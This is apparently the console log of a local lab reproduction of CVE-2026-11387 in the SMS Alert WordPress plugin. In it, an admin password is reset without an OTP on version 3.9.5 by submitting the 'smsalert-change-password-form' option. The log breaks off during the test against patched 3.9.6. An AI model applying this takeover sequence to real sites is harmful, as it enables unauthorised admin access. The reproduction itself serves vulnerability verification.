============================================ CVE-2026-11387 Reproduction SMS Alert <= 3.9.5 — Unauthenticated Password Reset ============================================ Start: 2026-07-05T10:47:11Z [*] Checking and installing dependencies... [+] PHP and MariaDB installed [+] wp-cli available: WP-CLI 2.12.0 [*] Starting MariaDB... mysqld is alive mysqld is alive [+] MariaDB is running [+] Database 'wordpress' ready [+] Plugin zips ready: -rw-r--r-- 1 vscode vscode 1011803 Jul 5 10:41 /data/pruva/runs/498d96fe-ed8a-4880-84f4-e061ac3467bf/bundle/artifacts/sms-alert-3.9.5.zip -rw-r--r-- 1 vscode vscode 1011957 Jul 5 10:42 /data/pruva/runs/498d96fe-ed8a-4880-84f4-e061ac3467bf/bundle/artifacts/sms-alert-3.9.6.zip [+] WordPress downloaded at /data/pruva/runs/498d96fe-ed8a-4880-84f4-e061ac3467bf/bundle/artifacts/wordpress [*] Configuring WordPress... Success: Generated 'wp-config.php' file. WordPress is already installed. [+] WordPress installed [+] WooCommerce active [+] PHP server running on http://localhost:8080 (PID=107794) ============================================ PHASE A: Exploit against VULNERABLE 3.9.5 ============================================ [*] Setting up SMS Alert 3.9.5... Plugin 'sms-alert' deactivated. Success: Deactivated 1 of 1 plugins. Deleted 'sms-alert' plugin. Success: Deleted 1 of 1 plugins. Plugin 'sms-alert' activated. Success: Installed 1 of 1 plugins. Success: Value passed for 'smsalert_gateway' option is unchanged. Success: Value passed for 'smsalert_general' option is unchanged. Success: Value passed for custom field 'billing_phone' is unchanged. Success: Updated user 1. [+] SMS Alert 3.9.5 configured (gateway creds set, reset_password=on, admin phone=919999990001) [*] Pre-exploit: admin password 'admin_original_123' check → OK [*] Step 1: Triggering OTP challenge for admin phone (919999990001)... HTTP 200 Session cookie: PHPSESSID=0f1b1609febe3cdbd361787ba27399f5 [*] Step 2: Submitting password change (option=smsalert-change-password-form)... HTTP 302 Location: http://localhost:8080/?page_id=8&password-reset=true [*] Post-exploit verification: New password 'Pwned!Pass42' → OK (expected: OK) Old password 'admin_original_123' → FAIL (expected: FAIL) [+] VULNERABLE 3.9.5: Exploit SUCCEEDED — admin password reset without OTP! ============================================ PHASE B: Exploit against PATCHED 3.9.6 ============================================ [*] Setting up SMS Alert 3.9.6... Plugin 'sms-alert' deactivated. Success: Deactivated 1 of 1 plugins. Deleted 'sms-alert' plugin. Success: Deleted 1 of 1 plugins. Plugin 'sms-alert' activated. Success: Installed 1 of 1 plugins. Success: Value passed for 'smsalert_gateway' option is unchanged. Success: Value passed for 'smsalert_general' option is unchanged. Success: Value passed for custom field 'billing_phone' is unchanged. Success: Updated user 1. [+] SMS Alert 3.9.6 configured (gateway creds set, reset_password=on, admin phone=919999990001) [*] Pre-exploit: admin password 'admin_original_123' check → OK [*] Step 1: Triggering OTP challenge for admin phone...